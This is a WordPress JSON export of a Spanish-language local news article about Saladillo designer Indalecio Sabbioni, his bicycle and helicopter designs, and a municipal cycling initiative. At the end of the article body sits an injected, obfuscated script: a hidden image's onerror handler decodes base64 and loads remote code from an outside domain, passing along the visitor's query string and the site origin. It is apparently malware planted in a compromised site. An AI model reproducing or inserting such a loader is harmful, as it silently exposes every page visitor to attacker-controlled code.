{"id":13881,"date":"2023-07-11T11:52:34","date_gmt":"2023-07-11T14:52:34","guid":{"rendered":"https:\/\/nubesmgzdigital.com.ar\/?p=13881"},"modified":"2025-08-13T16:14:45","modified_gmt":"2025-08-13T19:14:45","slug":"el-dueno-del-diseno-de-bicicletas-y-helicopteros-es-saladillense","status":"publish","type":"post","link":"https:\/\/nubesmgzdigital.com.ar\/index.php\/2023\/07\/11\/el-dueno-del-diseno-de-bicicletas-y-helicopteros-es-saladillense\/","title":{"rendered":"El due\u00f1o del dise\u00f1o de bicicletas y helic\u00f3pteros es saladillense"},"content":{"rendered":"\n<p class=\"has-white-color has-text-color has-background\" style=\"background-color:#8c0f2e\"><strong><em>Saladillo, en dos ruedas hacia la sustentabilidad<\/em><\/strong><\/p>\n\n\n\n<p>Indalecio Sabbioni es un joven dise\u00f1ador industrial, que en los \u00faltimos a\u00f1os viene trabajando fuertemente en el dise\u00f1o sustentable e innovador dentro de la industria de la bicicleta, pero adem\u00e1s es el elegido dentro de la f\u00e1brica de helic\u00f3pteros de Cicar\u00e9, para el dise\u00f1o de sus m\u00e1quinas. Actualmente junto a un amigo present\u00f3 un proyecto sustentable para Saladillo.<\/p>\n\n\n\n<p>Innovador, inquieto y por sobretodo amante de la tecnolog\u00eda y los avances, Sabbioni junto a Juan Dagostino, buscan instalar de la mano del Municipio un nuevo paradigma de movilidad urbana en Saladillo, con el fin de construir como dicen ellos \u201cun destino pensando en personas\u201d. Pero adem\u00e1s esta acci\u00f3n va acompa\u00f1ada como muchas otras que se est\u00e1n ideando en forma conjunta entre la sociedad y el estado municipal, para lograr una ciudad que haga la diferencia en materia de sustentabilidad.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" data-id=\"13882\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-verde-1024x1024.jpg\" alt=\"\" class=\"wp-image-13882\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-verde-1024x1024.jpg 1024w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-verde-300x300.jpg 300w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-verde-150x150.jpg 150w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-verde-768x768.jpg 768w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-verde-1536x1536.jpg 1536w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-verde-2048x2048.jpg 2048w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-verde-696x696.jpg 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-verde-1068x1068.jpg 1068w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-verde-420x420.jpg 420w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" data-id=\"13883\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/helibici-576x1024.jpg\" alt=\"\" class=\"wp-image-13883\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/helibici-576x1024.jpg 576w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/helibici-169x300.jpg 169w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/helibici-768x1365.jpg 768w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/helibici-864x1536.jpg 864w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/helibici-1152x2048.jpg 1152w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/helibici-696x1237.jpg 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/helibici-1068x1899.jpg 1068w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/helibici-236x420.jpg 236w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/helibici-scaled.jpg 1440w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"13884\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-duetta-1024x576.jpg\" alt=\"\" class=\"wp-image-13884\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-duetta-1024x576.jpg 1024w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-duetta-300x169.jpg 300w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-duetta-768x432.jpg 768w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-duetta-1536x864.jpg 1536w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-duetta-696x392.jpg 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-duetta-1068x601.jpg 1068w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-duetta-747x420.jpg 747w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/07\/indalecio-duetta.jpg 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u201cMejor en bici\u201d es un proyecto de un grupo de personas locales que, junto al municipio, busca crear acciones que incentiven el uso de transporte sostenible y de este modo poder repensar los espacios p\u00fablicos, con el fin de mejorar la calidad de vida. Indalecio Sabbioni y Juan Dagostino, expresaron que la idea es poner en agenda p\u00fablica distintas actividades que fomenten y faciliten este medio de movilizaci\u00f3n en la ciudad. \u201cEsto permitir\u00e1, entre otras cosas, mejorar la seguridad vial, democratizar el acceso del transporte, contribuir al cuidado del medioambiente, reducir el sedentarismo y contribuir a la agenda global de los ODS\u201d, concluyeron.<\/p>\n\n\n\n<p>Indalecio enfoca sus acciones en pos de la humanidad, todas sus creaciones y adaptaciones las publica en su p\u00e1gina para que cada uno pueda fabricar su propias bicis, descargando el plano de manera gratuita \u201cLa idea es proveer los dibujos con medidas principales para que otros puedan tomarlos y realizar sus cuadros, lo que hago es buscarle la vuelta para encontrar nuevas funciones\u201d, expres\u00f3.<\/p>\n\n\n\n<p>Adem\u00e1s, es el creador del modelo Duetta, una bicicleta \u00fanica, que permite llevar a otras personas de manera c\u00f3moda, sin hacer fuerza ni perder el equilibrio \u201cEs un dise\u00f1o simple pensado para integrar a otro, y hasta poder trasladar personas con discapacidad\u201d, dice Sabbioni.<\/p>\n\n\n\n<p>El joven saladillense sostiene que el uso del transporte sostenible trae distintos beneficios para las personas y las comunidades: bienestar f\u00edsico y mental, democratizaci\u00f3n del acceso al transporte, seguridad vial, mejores condiciones medioambientales y sociales, entre otras. \u201cDesde nuestro programa decidimos tomar dos ejes como gu\u00edas de desarrollo: &nbsp;primero garantizar el acceso a la educaci\u00f3n, la cultura y el deporte a los j\u00f3venes a trav\u00e9s de medios de transporte sostenibles y segundo, mejorar las condiciones de acceso al espacio p\u00fablico a las personas\u201d.<\/p>\n\n\n\n<p>Por su parte la directora de Turismo de Saladillo Leticia Col\u00e1s, quien asumi\u00f3 recientemente en el \u00e1rea, manifest\u00f3 que el objetivo es poder a futuro instalar un destino que fomente el uso de transporte sostenible, como as\u00ed tambi\u00e9n avanzar con la construcci\u00f3n de las bici sendas. La idea es que los visitantes puedan vivenciar la ciudad en un medio de transporte accesible. Esto tambi\u00e9n permitir\u00e1 realizar paradas para sacar fotos, recorrer caminos y senderos, que solo esta movilidad puede brindarles a los usuarios mientras se disfruta de los sonidos y aromas de la naturaleza\u201d. concluy\u00f3.<\/p>\n\n\n\n<p>De este modo Saladillo se proyecta a futuro con ideas que buscan mejorar el destino y como es caracter\u00edstico, con ideas innovadoras.<\/p>\n\n\n\n<p>Prensa y difusi\u00f3n: <\/p>\n\n\n\n<p>KAN &amp; CICARE<\/p>\n\n\n\n<p>@SOYSANDRAKAN @CRISTELACICARE<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Saladillo, en dos ruedas hacia la sustentabilidad Indalecio Sabbioni es un joven dise\u00f1ador industrial, que en los \u00faltimos a\u00f1os viene trabajando fuertemente en el dise\u00f1o sustentable e innovador dentro de la industria de la bicicleta, pero adem\u00e1s es el elegido dentro de la f\u00e1brica de helic\u00f3pteros de Cicar\u00e9, para el dise\u00f1o de sus m\u00e1quinas. Actualmente [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":13883,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[138,139],"tags":[],"class_list":["post-13881","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-medio-ambiente","category-tecnologias"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/13881","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/comments?post=13881"}],"version-history":[{"count":2,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/13881\/revisions"}],"predecessor-version":[{"id":19506,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/13881\/revisions\/19506"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/media\/13883"}],"wp:attachment":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/media?parent=13881"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/categories?post=13881"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/tags?post=13881"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}